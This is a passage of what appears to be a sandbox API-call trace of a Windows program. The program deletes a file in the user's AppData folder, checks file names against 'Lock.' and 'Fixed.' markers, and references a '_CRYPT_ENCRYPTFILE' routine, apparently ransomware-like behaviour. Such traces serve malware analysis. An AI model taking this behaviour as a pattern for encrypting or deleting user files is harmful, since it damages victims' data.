(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0238.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0238.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0238.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0238.622] CloseHandle (hObject=0x2d0) returned 1 [0238.626] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0238.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0238.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0238.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0238.627] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0238.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0238.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0238.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0238.627] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0238.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0238.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0238.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0238.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0238.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0238.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0238.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0238.628] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/R2j101Rhh.mp4", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\R2j101Rhh.mp4", lpFilePart=0x8cedf4*="R2j101Rhh.mp4") returned 0x2d [0238.628] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\R2j101Rhh.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\r2j101rhh.mp4")) returned 0x20 [0238.628] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\R2j101Rhh.mp4", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99e6e240, ftCreationTime.dwHighDateTime=0x1d5ef13, ftLastAccessTime.dwLowDateTime=0xf39202f0, ftLastAccessTime.dwHighDateTime=0x1d5e2b8, ftLastWriteTime.dwLowDateTime=0xf39202f0, ftLastWriteTime.dwHighDateTime=0x1d5e2b8, nFileSizeHigh=0x0, nFileSizeLow=0x3eb0, dwReserved0=0x1, dwReserved1=0x1c, cFileName="R2j101Rhh.mp4", cAlternateFileName="R2J101~1.MP4")) returned 0xa876d0 [0238.628] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\R2j101Rhh.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\r2j101rhh.mp4")) returned 1 [0238.669] FindNextFileW (in: hFindFile=0xa876d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99e6e240, ftCreationTime.dwHighDateTime=0x1d5ef13, ftLastAccessTime.dwLowDateTime=0xf39202f0, ftLastAccessTime.dwHighDateTime=0x1d5e2b8, ftLastWriteTime.dwLowDateTime=0xf39202f0, ftLastWriteTime.dwHighDateTime=0x1d5e2b8, nFileSizeHigh=0x0, nFileSizeLow=0x3eb0, dwReserved0=0x1, dwReserved1=0x1c, cFileName="R2j101Rhh.mp4", cAlternateFileName="R2J101~1.MP4")) returned 0 [0238.669] FindClose (in: hFindFile=0xa876d0 | out: hFindFile=0xa876d0) returned 1 [0238.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0238.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0238.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0238.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0238.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0238.670] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0238.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0238.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0238.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0238.670] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0238.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0238.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0238.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0238.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0238.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0238.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0238.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0238.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0238.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0238.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0238.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0238.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0238.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0238.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0238.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0238.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0238.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0238.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0238.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0238.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5c) returned 0x2e564e0 [0238.671] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/R2j101Rhh.mp4", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\R2j101Rhh.mp4", lpFilePart=0x8cf650*="R2j101Rhh.mp4") returned 0x2d [0238.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0238.671] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\R2j101Rhh.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\r2j101rhh.mp4")) returned 0xffffffff [0238.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0238.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0238.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0238.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0238.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0238.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0238.671] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0238.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0238.726] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0238.726] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0238.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0238.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0238.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0238.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0238.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0238.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0238.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0238.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0238.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0238.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0238.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0238.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0238.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0238.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TXuB6gyi89__NoT9.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0238.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XuB6gyi89__NoT9.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0238.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uB6gyi89__NoT9.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0238.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B6gyi89__NoT9.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0238.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6gyi89__NoT9.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0238.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gyi89__NoT9.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0238.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yi89__NoT9.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0238.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i89__NoT9.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0238.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="89__NoT9.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0238.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9__NoT9.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0238.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="__NoT9.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0238.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_NoT9.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0238.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NoT9.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0238.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oT9.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0238.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T9.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0238.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0238.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0238.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0238.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0238.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0238.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0238.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0238.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0238.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0238.727] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0238.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0238.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0238.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0238.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0238.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0238.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0238.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0238.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0238.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0238.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0238.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0238.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0238.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0238.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0238.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0238.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0238.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0238.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0238.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a) returned 0x2f04118 [0238.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0238.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TXuB6gyi89__NoT9.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0238.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XuB6gyi89__NoT9.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0238.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uB6gyi89__NoT9.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0238.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B6gyi89__NoT9.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0238.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6gyi89__NoT9.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0238.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gyi89__NoT9.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0238.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yi89__NoT9.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0238.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i89__NoT9.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0238.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="89__NoT9.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0238.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9__NoT9.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0238.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="__NoT9.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0238.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_NoT9.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0238.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NoT9.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0238.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oT9.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0238.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T9.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0238.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0238.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0238.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0238.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0238.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0238.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0238.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0238.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0238.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0238.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0238.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0238.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0238.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0238.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0238.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0238.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0238.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0238.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0238.729] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0238.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0238.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0238.730] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0238.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0238.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0238.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0238.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0238.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0238.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0238.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0238.730] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0238.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0238.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0238.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0238.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0238.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0238.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0238.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0238.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0238.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0238.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0238.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0238.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0238.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0238.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0238.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0238.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0238.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0238.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0238.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0238.731] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0238.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0238.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0238.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0238.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0238.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0238.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0238.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0238.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0238.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0238.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0238.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0238.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0238.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0238.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0238.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0238.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0238.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0238.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0238.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0238.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0238.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0238.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0238.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503c8 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 